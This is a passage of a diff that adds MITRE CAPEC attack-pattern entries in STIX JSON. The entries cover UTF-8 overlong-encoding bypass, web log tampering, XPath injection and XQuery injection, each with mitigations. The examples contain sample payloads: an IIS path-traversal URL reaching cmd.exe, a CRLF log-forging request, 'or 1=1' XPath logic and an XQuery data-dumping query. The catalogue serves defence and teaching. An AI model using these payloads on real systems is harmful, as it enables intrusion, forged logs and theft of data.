Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11", + "external_id": "REF-533", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc3629.html" + }, + { + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "external_id": "REF-114", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1232" + }, + { + "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.", + "external_id": "REF-535", + "source_name": "reference_from_CAPEC", + "url": "http://www.unicode.org/versions/corrigendum1.html" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19", + "external_id": "REF-537", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt" + } + ], + "id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using UTF-8 Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, they accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.
    Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.
    Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770" + ], + "x_capec_prerequisites": [ + "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.", + "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.", + "id": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "id": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cdd3394b-f883-47bf-a85c-0a79d48872bf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", + "id": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9116b922-43a0-4491-8306-52e2c12b1dbf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", + "id": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ec596d0-6f5a-467d-b542-5bcad89fb1d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee809e72-9489-47d3-8a97-15d2e21d67a6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

    2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

    2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use input validation before writing to web log", + "id": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abbb4499-f5b6-4bd9-9b82-f6302c635ae9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "spec_version": "2.1", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all log data before it is output", + "id": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c13cda6-424c-4bee-a156-88983f9443e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "spec_version": "2.1", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-82", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/82.html" + } + ], + "id": "attack-pattern--498a90d8-abbe-4fa9-8b19-549daa1c24ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

    2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.

  2. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

    3. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

    2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", + "id": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d639463-ea08-4233-a922-f74423845236", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", + "id": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--edff9072-fa08-4afe-a489-21b0eafd515a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--221561aa-fdbc-4618-ad52-cff378722a38", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "spec_version": "2.1", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", + "external_references": [ + { + "external_id": "CAPEC-84", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/84.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XQuery Injection", + "external_id": "46", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XQuery-Injection" + } + ], + "id": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XQuery Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
